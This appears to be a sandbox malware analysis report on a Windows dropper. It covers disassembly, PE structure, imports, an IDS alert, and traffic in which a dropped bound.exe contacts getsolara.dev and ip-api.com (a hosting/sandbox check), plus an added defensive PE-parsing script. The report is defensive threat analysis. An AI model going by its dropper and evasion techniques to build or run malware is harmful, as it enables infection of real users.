call 00007F088532C9D0h
test al, al
jne 00007F088532BF96h
xor al, al
jmp 00007F088532BFA6h
call 00007F08853394EFh
test al, al
jne 00007F088532BF9Bh
xor ecx, ecx
call 00007F088532C9E0h
jmp 00007F088532BF7Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F088532BFF9h
cmp ecx, 01h
jnbe 00007F088532BFFCh
call 00007F088532C52Eh
test eax, eax
je 00007F088532BFBAh
test ebx, ebx
jne 00007F088532BFB6h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F08853392E2h
Data directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3ca5c          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x47000          0x948         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x44000          0x2250        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x7d999a         0x2448        (none: this value is a file offset, not an RVA)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x48000          0x764         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3a080          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x39f40          0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2b000          0x4a0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

The security directory is the one entry whose "virtual address" is a raw file offset. The six section raw sizes listed below add up to 0x41000 bytes, so roughly 7.9 MB of overlay lies between the end of the last section and the 0x2448-byte certificate table at 0x7d999a. Authenticode hashes everything in the file except the checksum, this directory entry and the certificate table itself, so that overlay is covered by the signature; a file that has had data appended after signing, or a signature copied from another file, fails with exactly the Error Number (-2146869232) shown on the certificate above.
Sections

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x29f00       0x2a000   2a7ae207b6295492e9da088072661752  False     0.5514439174107143  data       6.487454925709845   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2b000          0x12a50       0x12c00   c01bb074df560cd8e3d3866c1527a376  False     0.5244791666666667  data       5.752630761733724   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x53f8        0xe00     dba0caeecab624a0ccc0d577241601d1  False     0.134765625         data       1.8392217063172436  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x44000          0x2250        0x2400    f5559f14427a02f0a5dbd0dd026cae54  False     0.470703125         data       5.291665041994019   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x47000          0x948         0xa00     24829056555b7eb4ad986ec49f8a9d30  False     0.427734375         data       5.103467399652208   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x48000          0x764         0x800     816c68eeb419ee2c08656c31c06a0fff  False     0.5576171875        data       5.2809528666624175  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

None of the sections looks packed: the highest entropy, 6.49 for .text, is ordinary for compiled x64 code, and .data's virtual size (0x53f8) exceeding its raw size (0xe00) is just zero-initialised data that is not stored in the file. There is no TLS directory and no COM descriptor, so this container is a native executable rather than a .NET one.
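To reproduce the Virtual Address, Virtual Size, Raw Size, MD5 and Entropy columns of the section table above, and to read the security directory as the file offset it actually is (and so measure the overlay that sits in front of the certificate table), here is an added stand-alone Python example. It is not code from the Joe Sandbox report or from any tool the report uses; it parses the PE headers with the standard library only. Because no sample binary can ship with the page, build_sample_pe() fabricates a tiny PE32+ image with two made-up sections, a padding overlay and a dummy certificate table so the script runs offline; those names, sizes and offsets are assumptions for the demo, not values from the analysed file.

```python
"""Static PE triage with the standard library: section table (VA, sizes, MD5,
Shannon entropy), security directory and the overlay in front of it.

Added example; not code from the Joe Sandbox report or any tool it uses.
build_sample_pe() fabricates a small PE32+ image so the script runs offline."""
import hashlib
import math
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # the one directory whose "VA" is a file offset


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c) or 0.0


def parse_pe(blob):
    """Return machine, per-section records and the security directory of a PE32/PE32+ file."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x20B:        # PE32+: data directories begin 112 bytes into the optional header
        dirs = opt + 112
    elif magic == 0x10B:      # PE32: 96 bytes
        dirs = opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sec_off, sec_size = struct.unpack_from("<II", blob, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)

    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i          # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, hdr)
        chars = struct.unpack_from("<I", blob, hdr + 36)[0]
        raw = blob[rawptr:rawptr + rawsize]    # only the stored bytes count, like the report's Raw Size
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize,
                         "raw_size": rawsize, "raw_ptr": rawptr,
                         "md5": hashlib.md5(raw).hexdigest(),
                         "entropy": shannon_entropy(raw), "characteristics": chars})
    end_of_sections = max((s["raw_ptr"] + s["raw_size"] for s in sections), default=0)
    return {"machine": machine, "pe32plus": magic == 0x20B, "sections": sections,
            "security_offset": sec_off, "security_size": sec_size,
            "end_of_sections": end_of_sections,
            # bytes between the last section's raw data and the certificate table;
            # Authenticode hashes this overlay, so appending to a signed file breaks the digest
            "overlay_before_signature": (sec_off - end_of_sections) if sec_off else None}


def build_sample_pe():
    """Fabricate a minimal PE32+ (not a runnable program; constructed test input):
    two sections, a 4 KiB overlay and a 16-byte dummy certificate table."""
    hdr_size = 0x200
    text_raw = bytes(range(256)) * 2          # every byte value twice -> entropy 8.0
    data_raw = b"\0" * 0x200                  # constant bytes -> entropy 0.0
    overlay, cert = b"\xAB" * 0x1000, b"\0" * 0x10
    text_ptr, data_ptr = hdr_size, hdr_size + len(text_raw)
    cert_off = data_ptr + len(data_raw) + len(overlay)

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x22)  # AMD64, 2 sections, 240-byte opt hdr
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                          # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                           # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_off, len(cert))

    def section(name, vsize, va, rawsize, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, ptr, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x1F0, 0x1000, len(text_raw), text_ptr, 0x60000020)
               + section(b".data", 0x100, 0x2000, len(data_raw), data_ptr, 0xC0000040))
    headers += b"\0" * (hdr_size - len(headers))
    return headers + text_raw + data_raw + overlay + cert


def report(blob):
    """Render the parsed image as text lines in the report's column order."""
    info = parse_pe(blob)
    lines = ["%-8s %-10s %-10s %-10s %-32s %s" % ("Name", "VA", "VSize", "RawSize", "MD5", "Entropy")]
    for s in info["sections"]:
        lines.append("%-8s 0x%-8x 0x%-8x 0x%-8x %s %.3f" % (
            s["name"], s["virtual_address"], s["virtual_size"], s["raw_size"], s["md5"], s["entropy"]))
    if info["overlay_before_signature"] is not None:
        lines.append("certificate table at file offset 0x%x (size 0x%x); overlay before it: 0x%x bytes"
                     % (info["security_offset"], info["security_size"], info["overlay_before_signature"]))
    return lines


if __name__ == "__main__":
    print("\n".join(report(build_sample_pe())))
```

Run it against a real file with `parse_pe(open(path, "rb").read())`: a security offset that lies megabytes past end_of_sections, as in the directory table above, is the overlay to carve and inspect next, and entropy near 8.0 in a section that should hold code is the usual packing tell.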
Resources

Name         RVA      Size   Type                          Language  Country  ZLIB Complexity
RT_VERSION   0x470a0  0x398  OpenPGP Public Key                               0.46195652173913043
RT_MANIFEST  0x47438  0x50d  XML 1.0 document, ASCII text                     0.4694508894044857

The Type column is a content-sniffing guess over the raw resource bytes. An RT_VERSION resource is a VS_VERSIONINFO block, not a PGP key; the "OpenPGP Public Key" label is a misidentification and should not be read as the sample carrying key material.
Imports

USER32.dll: CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll: (no named imports listed)
KERNEL32.dll: GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll: OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll: SelectObject, DeleteObject, CreateFontIndirectW

For triage, the combination worth noting in KERNEL32 is GetTempPathW, CreateDirectoryW, CreateFileW, WriteFile, CreateProcessW and DeleteFileW (write to %TEMP%, execute, clean up), SetDllDirectoryW with LoadLibraryExW (control of the DLL search path for whatever is dropped), and IsDebuggerPresent. The network traffic below is not explained by these imports: there is no WinINet, WinHTTP or Winsock import, so the connection is made by a child process rather than by this container itself.
Suricata IDS Alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T18:44:34.269854+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49785 | 172.67.203.125 | 443 | TCP
TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 18:44:29.826904058 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:29.826946974 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:29.827014923 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:29.876116037 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:29.876138926 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:30.532674074 CET | 49769 | 80 | 192.168.2.9 | 208.95.112.1
Oct 27, 2024 18:44:30.538253069 CET | 80 | 49769 | 208.95.112.1 | 192.168.2.9
Oct 27, 2024 18:44:30.538376093 CET | 49769 | 80 | 192.168.2.9 | 208.95.112.1
Oct 27, 2024 18:44:30.538531065 CET | 49769 | 80 | 192.168.2.9 | 208.95.112.1
Oct 27, 2024 18:44:30.543807983 CET | 80 | 49769 | 208.95.112.1 | 192.168.2.9
Oct 27, 2024 18:44:30.548291922 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:30.548407078 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:30.597095966 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:30.597177982 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:30.597868919 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:30.710704088 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:30.882479906 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:30.923324108 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:31.074922085 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:31.075014114 CET | 443 | 49767 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:31.075059891 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:31.100531101 CET | 49767 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:31.137918949 CET | 80 | 49769 | 208.95.112.1 | 192.168.2.9
Oct 27, 2024 18:44:31.138680935 CET | 49769 | 80 | 192.168.2.9 | 208.95.112.1
Oct 27, 2024 18:44:31.144368887 CET | 80 | 49769 | 208.95.112.1 | 192.168.2.9
Oct 27, 2024 18:44:31.144418955 CET | 49769 | 80 | 192.168.2.9 | 208.95.112.1
Oct 27, 2024 18:44:33.470911980 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:33.470957994 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:33.471035957 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:33.473743916 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:33.473757982 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.092343092 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.092443943 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:34.096478939 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:34.096486092 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.096785069 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.098364115 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:34.139333010 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.269866943 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.270010948 CET | 443 | 49785 | 172.67.203.125 | 192.168.2.9
Oct 27, 2024 18:44:34.270167112 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:34.270642042 CET | 49785 | 443 | 192.168.2.9 | 172.67.203.125
Oct 27, 2024 18:44:34.588545084 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:34.588645935 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:34.588721037 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:34.589135885 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:34.589171886 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.458111048 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.458184004 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:35.460622072 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:35.460629940 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.460899115 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.461961985 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:35.503371000 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.921566963 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.921633005 CET | 443 | 49792 | 128.116.123.4 | 192.168.2.9
Oct 27, 2024 18:44:35.921710968 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:35.928989887 CET | 49792 | 443 | 192.168.2.9 | 128.116.123.4
Oct 27, 2024 18:44:37.598669052 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:37.598710060 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:37.599026918 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:37.599539995 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:37.599564075 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.229173899 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.229744911 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:38.234246016 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:38.234265089 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.234607935 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.236049891 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:38.283325911 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.698509932 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.698637962 CET | 443 | 49809 | 104.20.23.46 | 192.168.2.9
Oct 27, 2024 18:44:38.698705912 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
Oct 27, 2024 18:44:38.699573040 CET | 49809 | 443 | 192.168.2.9 | 104.20.23.46
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 18:44:27.269191027 CET | 62870 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:27.289382935 CET | 53 | 62870 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:29.812438965 CET | 57784 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:29.820825100 CET | 53 | 57784 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:30.232682943 CET | 58214 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:30.528913021 CET | 53 | 58214 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:34.572330952 CET | 62735 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:34.580302000 CET | 53 | 62735 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:37.589793921 CET | 60704 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:37.598038912 CET | 53 | 60704 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:38.700347900 CET | 49180 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:38.708708048 CET | 53 | 49180 | 1.1.1.1 | 192.168.2.9
Oct 27, 2024 18:44:55.312655926 CET | 53 | 56219 | 162.159.36.2 | 192.168.2.9
Oct 27, 2024 18:44:55.928215981 CET | 49719 | 53 | 192.168.2.9 | 1.1.1.1
Oct 27, 2024 18:44:55.936969042 CET | 53 | 49719 | 1.1.1.1 | 192.168.2.9
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 18:44:27.269191027 CET | 192.168.2.9 | 1.1.1.1 | 0xacb4 | Standard query (0) | blank-8rmnx.in | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:29.812438965 CET | 192.168.2.9 | 1.1.1.1 | 0xa398 | Standard query (0) | getsolara.dev | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:30.232682943 CET | 192.168.2.9 | 1.1.1.1 | 0x345e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:34.572330952 CET | 192.168.2.9 | 1.1.1.1 | 0x6329 | Standard query (0) | clientsettings.roblox.com | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:37.589793921 CET | 192.168.2.9 | 1.1.1.1 | 0x3948 | Standard query (0) | www.nodejs.org | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:38.700347900 CET | 192.168.2.9 | 1.1.1.1 | 0xd53 | Standard query (0) | nodejs.org | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:55.928215981 CET | 192.168.2.9 | 1.1.1.1 | 0x77ac | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 18:44:27.289382935 CET | 1.1.1.1 | 192.168.2.9 | 0xacb4 | Name error (3) | blank-8rmnx.in | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:29.820825100 CET | 1.1.1.1 | 192.168.2.9 | 0xa398 | No error (0) | getsolara.dev | | 172.67.203.125 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:29.820825100 CET | 1.1.1.1 | 192.168.2.9 | 0xa398 | No error (0) | getsolara.dev | | 104.21.93.27 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:30.528913021 CET | 1.1.1.1 | 192.168.2.9 | 0x345e | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:34.580302000 CET | 1.1.1.1 | 192.168.2.9 | 0x6329 | No error (0) | clientsettings.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 27, 2024 18:44:34.580302000 CET | 1.1.1.1 | 192.168.2.9 | 0x6329 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 27, 2024 18:44:34.580302000 CET | 1.1.1.1 | 192.168.2.9 | 0x6329 | No error (0) | edge-term4.roblox.com | edge-term4-fra2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 27, 2024 18:44:34.580302000 CET | 1.1.1.1 | 192.168.2.9 | 0x6329 | No error (0) | edge-term4-fra2.roblox.com | | 128.116.123.4 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:37.598038912 CET | 1.1.1.1 | 192.168.2.9 | 0x3948 | No error (0) | www.nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:37.598038912 CET | 1.1.1.1 | 192.168.2.9 | 0x3948 | No error (0) | www.nodejs.org | | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:44:38.708708048 CET | 1.1.1.1 | 192.168.2.9 | 0xd53 | No error (0) | nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.708708048 CET1.1.1.1192.168.2.90xd53No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.936969042 CET1.1.1.1192.168.2.90x77acName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                            • getsolara.dev
                                                                                                                                                                                                                            • clientsettings.roblox.com
                                                                                                                                                                                                                            • www.nodejs.org
                                                                                                                                                                                                                            • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49769 | 208.95.112.1 | 80 | 7664 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe

Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 18:44:30.538531065 CET | 117 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3
Oct 27, 2024 18:44:31.137918949 CET | 174 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 17:44:30 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49767 | 172.67.203.125 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\bound.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 17:44:30 UTC | 81 | OUT | GET /asset/discord.json HTTP/1.1
Host: getsolara.dev
Connection: Keep-Alive
2024-10-27 17:44:31 UTC | 1021 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 17:44:31 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMwUJ68ai%2BsAJxN%2F1VPuoofgttEPwoK2E6xynsvcdnp5k%2BhB%2FaEVwxq3YOpwTSbLLKUXsST9N8Eo6naIspZKgSogcDyTFMijSCXaeXc13ROgM1BP3aXgkter4tv1Vdr9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=0
Server: cloudflare
CF-RAY: 8d947e9978d76c62-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2813&recv_bytes=695&delivery_rate=2468883&cwnd=242&unsent_bytes=0&cid=0f313bf74048c711&ts=581&x=0"
2024-10-27 17:44:31 UTC | 109 | IN | Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
